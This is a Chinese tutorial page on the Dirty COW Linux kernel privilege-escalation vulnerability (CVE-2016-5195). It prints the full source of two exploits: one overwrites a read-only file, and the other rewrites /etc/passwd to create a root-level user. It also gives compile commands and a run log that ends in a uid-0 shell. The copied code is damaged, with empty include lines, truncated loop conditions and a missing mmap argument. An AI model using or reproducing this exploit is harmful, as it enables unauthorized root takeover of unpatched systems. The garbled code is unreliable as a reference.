str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow： Linux内核提权漏洞

本文主要向大家介Linux运维知识之CVE-2016-5195 Dirtycow： Linux内核提权漏洞绍了，通过具体的内容向大家展现，希望对大家学习Linux运维知识有所帮助。

CVE-2016-5195 Dirtycow： Linux内核提权漏洞

以下都是github上找的源码，然后在ubuntu-12.04.5-desktop-i386上实验成功

首先运行下面的确定漏洞：

####################### dirtyc0w.c #######################

$ sudo -s

# echo this is not a test > foo

# chmod 0404 foo

$ ls -lah foo

-r-----r-- 1 root root 19 Oct 20 15:23 foo

$ cat foo

this is not a test

$ gcc -pthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000

$ cat foo

m00000000000000000

正确输出最后值说明漏洞存在(以上有两条是root权限运行的命令)

####################### dirtyc0w.c #######################

#include

void *map;

int f;

struct stat st;

char *name;

void *madviseThread(void *arg)

{

char *str;

str=(char*)arg;

int i,c=0;

for(i=0;i<100000000;i++)

{

You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661

> This is achieved by racing the madvise(MADV_DONTNEED) system call

> while having the page of the executable mmapped in memory.

c+=madvise(map,100,MADV_DONTNEED);

}

printf("madvise %d\n\n",c);

}

void *procselfmemThread(void *arg)

{

char *str;

str=(char*)arg;

You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16

> The in the wild exploit we are aware of doesn‘t work on Red Hat

> Enterprise Linux 5 and 6 out of the box because on one side of

> the race it writes to /proc/self/mem, but /proc/self/mem is not

> writable on Red Hat Enterprise Linux 5 and 6.

int f=open("/proc/self/mem",O_RDWR);

int i,c=0;

for(i=0;i<100000000;i++) {

You have to reset the file pointer to the memory position.

lseek(f,(uintptr_t) map,SEEK_SET);

c+=write(f,str,strlen(str));

}

printf("procselfmem %d\n\n", c);

}

int main(int argc,char *argv[])

{

You have to pass two arguments. File and Contents.

if (argc<3) {

(void)fprintf(stderr, "%s\n",

"usage: dirtyc0w target_file new_content");

return 1; }

pthread_t pth1,pth2;

You have to open the file in read only mode.

f=open(argv[1],O_RDONLY);

fstat(f,&st);

name=argv[1];

You have to use MAP_PRIVATE for copy-on-write mapping.

> Create a private copy-on-write mapping. Updates to the

> mapping are not visible to other processes mapping the same

> file, and are not carried through to the underlying file. It

> is unspecified whether changes made to the file after the

> mmap() call are visible in the mapped region.

You have to open with PROT_READ.

map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

printf("mmap %zx\n\n",(uintptr_t) map);

You have to do it on two threads.

pthread_create(&pth1,NULL,madviseThread,argv[1]);

pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

You have to wait for the threads to finish.

pthread_join(pth1,NULL);

pthread_join(pth2,NULL);

return 0;

}

漏洞利用源码：

// This exploit uses the pokemon exploit of the dirtycow vulnerability

// as a base and automatically generates a new passwd line.

// The user will be prompted for the new password when the binary is run.

// The original /etc/passwd file is then backed up to /tmp/passwd.bak

// and overwrites the root account with the generated line.

// After running the exploit you should be able to login with the newly

// created user.

// To use this exploit modify the user values according to your needs.

// The default is "firefart".

// Original exploit (dirtycow‘s ptrace_pokedata "pokemon" method):

// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

// Compile with:

// gcc -pthread dirty.c -o dirty -lcrypt

// Then run the newly create binary by either doing:

// "./dirty" or "./dirty my-new-password"

// Afterwards, you can either "su firefart" or "ssh firefart@..."

// DON‘T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!

// mv /tmp/passwd.bak /etc/passwd

// Exploit adopted by Christian "FireFart" Mehlmauer

// https://firefart.at

// $ gcc -pthread dirty.c -o dirty -lcrypt

// $ ./dirty test(test为密码)

// $ su firefart(在输入test密码即可)

// 普通用户运行上述命令后，firefart用户变为root，原始root不存在

#include

const char *filename = "/etc/passwd";

const char *backup_filename = "/tmp/passwd.bak";

const char *salt = "firefart";

int f;

void *map;

pid_t pid;

pthread_t pth;

struct stat st;

struct Userinfo {

char *username;

char *hash;

int user_id;

int group_id;

char *info;

char *home_dir;

char *shell;

};

char *generate_password_hash(char *plaintext_pw) {

return crypt(plaintext_pw, salt);

}

char *generate_passwd_line(struct Userinfo u) {

const char *format = "%s:%s:%d:%d:%s:%s:%s\n";

int size = snprintf(NULL, 0, format, u.username, u.hash,

u.user_id, u.group_id, u.info, u.home_dir, u.shell);

char *ret = malloc(size + 1);

sprintf(ret, format, u.username, u.hash, u.user_id,

u.group_id, u.info, u.home_dir, u.shell);

return ret;

}

void *madviseThread(void *arg) {

int i, c = 0;

for(i = 0; i

c += madvise(map, 100, MADV_DONTNEED);

}

printf("madvise %d\n\n", c);

}

int copy_file(const char *from, const char *to) {

// check if target file already exists

if(access(to, F_OK) != -1) {

printf("File %s already exists! Please delete it and run again\n",

to);

return -1;

}

char ch;

FILE *source, *target;

source = fopen(from, "r");

if(source == NULL) {

return -1;

}

target = fopen(to, "w");

if(target == NULL) {

fclose(source);

return -1;

}

while((ch = fgetc(source)) != EOF) {

fputc(ch, target);

}

printf("%s successfully backed up to %s\n",

from, to);

fclose(source);

fclose(target);

return 0;

}

int main(int argc, char *argv[])

{

// backup file

int ret = copy_file(filename, backup_filename);

if (ret != 0) {

exit(ret);

}

struct Userinfo user;

// set values, change as needed

user.username = "firefart";

user.user_id = 0;

user.group_id = 0;

user.info = "pwned";

user.home_dir = "/root";

user.shell = "/bin/bash";

char *plaintext_pw;

if (argc >= 2) {

plaintext_pw = argv[1];

printf("Please enter the new password: %s\n", plaintext_pw);

} else {

plaintext_pw = getpass("Please enter the new password: ");

}

user.hash = generate_password_hash(plaintext_pw);

char *complete_passwd_line = generate_passwd_line(user);

printf("Complete line:\n%s\n", complete_passwd_line);

f = open(filename, O_RDONLY);

fstat(f, &st);

map = mmap(NULL,

st.st_size + sizeof(long),

PROT_READ,

MAP_PRIVATE,

0);

printf("mmap: %lx\n",(unsigned long)map);

pid = fork();

if(pid) {

waitpid(pid, NULL, 0);

int u, i, o, c = 0;

int l=strlen(complete_passwd_line);

for(i = 0; i

for(o = 0; o

for(u = 0; u

c += ptrace(PTRACE_POKETEXT,

pid,

map + o,

*((long*)(complete_passwd_line + o)));

}

printf("ptrace %d\n",c);

}

else {

pthread_create(&pth,

NULL,

madviseThread,

NULL);

ptrace(PTRACE_TRACEME);

kill(getpid(), SIGSTOP);

pthread_join(pth,NULL);

}

printf("Done! Check %s to see if the new user was created.\n", filename);

printf("You can log in with the username ‘%s‘ and the password ‘%s‘.\n\n",

user.username, plaintext_pw);

printf("\nDON‘T FORGET TO RESTORE! $ mv %s %s\n",

backup_filename, filename);

return 0;

}

运行结果：

1、漏洞存在与否：jin@jin:/home/poc/dirty$ ls

dirty.c dirtyc0w.c

jin@jin:/home/poc/dirty$ sudo -s

[sudo] password for jin:

root@jin:/home/poc/dirty# echo this is not a test > foo

root@jin:/home/poc/dirty# chmod 0404 foo

root@jin:/home/poc/dirty# gcc -pthread dirtyc0w.c -o dirtyc0w

root@jin:/home/poc/dirty# ./dirtyc0w foo m00000000000000000

mmap b7741000

madvise 0

procselfmem 1800000000

root@jin:/home/poc/dirty# cat foom00000000000000000

2、漏洞利用：root@jin:/home/poc/dirty# su jin

jin@jin:/home/poc/dirty$ gcc -pthread dirty.c -o dirty -lcrypt

jin@jin:/home/poc/dirty$ ./dirty test

/etc/passwd successfully backed up to /tmp/passwd.bak

Please enter the new password: test

Complete line:

firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash

mmap: b77b8000

madvise 0

ptrace 0

Done! Check /etc/passwd to see if the new user was created.

You can log in with the username ‘firefart‘ and the password ‘test‘.

DON‘T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Done! Check /etc/passwd to see if the new user was created.

You can log in with the username ‘firefart‘ and the password ‘test‘.

DON‘T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

jin@jin:/home/poc/dirty$ su

Password:

su: Authentication failure

jin@jin:/home/poc/dirty$ sudo su

sudo: unknown user: root

sudo: unable to initialize policy plugin

jin@jin:/home/poc/dirty$ su firefart

Password:

firefart@jin:/home/poc/dirty# id

uid=0(firefart) gid=0(root) groups=0(root)

本文由职坐标整理并发布，希望对同学们有所帮助。了解更多详情请关注系统运维Linux频道！

str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow： Linux内核提权漏洞相关推荐

linux高级运维笔试简答题及答案,企业linux初级和高级运维面试常问题目问答总结技巧讲解（2020年录制）...
课程增值: 课程是我最近面试辅导的所有学员,成功找到工作,企业常问题目,我带领大家学习,面试如何问答. 我曾经经历面试linux运维没有做大量准备,经历大量hr给我说的一句话就是回家等通知吧,心碎了 ...
千峰云计算linux教程650集，linux系统运维从入门到精通教程（Linux安装极速入门，零基础必备）
第一天 1. 完成VMware下载,centos7下载,完成配置,获得模拟服务器一台. 2. 使用root登录. 服务器 (可以当初普通计算机,与普通的计算机内部结构相差不大) VMware是安装虚拟 ...
Linux日常运维（rsync通过服务连接，linux日志，screen）
一.rsync通过服务同步分为服务端(server1) 和客户端(server2) 服务端(server1): [root@litongyao ~]# vim /etc/rsyncd.conf po ...
很实用的Linux 系统运维常用命令及常识(超实用)
很实用的Linux 系统运维常用命令及常识(超实用) 作为Linux运维,需要了解Linux操作系统的基本使用和管理知识,下面脚本之家小编给大家介绍下Linux运维需要掌握的命令,想成为Linux运维 ...
运维工程师必会的linux命令下载,运维工程师必会的109个Linux命令.pdf
Linux公社运维工程师必会的109 个Linux 命令版本 1.0 崔存新目录 1 文件管理 5 1.1 basename 5 1.2 cat 5 1.3 cd 6 1.4 chgrp 6 1 ...
linux怎么用命令打开wine,Linux系统运维：10分钟教你如何使用Wine在Linux下玩魔兽世界...
本文主要向大家介绍了Linux系统运维的如何使用Wine在Linux下玩魔兽世界,通过具体的步骤向大家展现,希望对大家学习Linux系统运维有所帮助. 目标:在 Linux 中运行魔兽世界发行版:适 ...
linux系统运维面试题
标签:linux系统运维面试题 1. 简述常用高可用技术解答: Keepalived:Keepalived是一个保证集群高可用的服务软件,用来防止单点故障,使用VRRP协议实现.在maste ...
力作推荐!!!! 防线：企业Linux安全运维理念和实战（向世界500强企业学习Linux安全管理与运维之道）...
防线:企业Linux安全运维理念和实战(向世界500强企业学习Linux安全管理与运维之道) 新书发售 http://product.dangdang.com/product.aspx?pr ...
【微学堂】线上Linux服务器运维安全策略经验分享
技术转载:https://mp.weixin.qq.com/s?__biz=MjM5NTU2MTQwNA==&mid=402022683&idx=1&sn=6d403ab447 ...

str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow： Linux内核提权漏洞

str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow： Linux内核提权漏洞相关推荐

最新文章

热门文章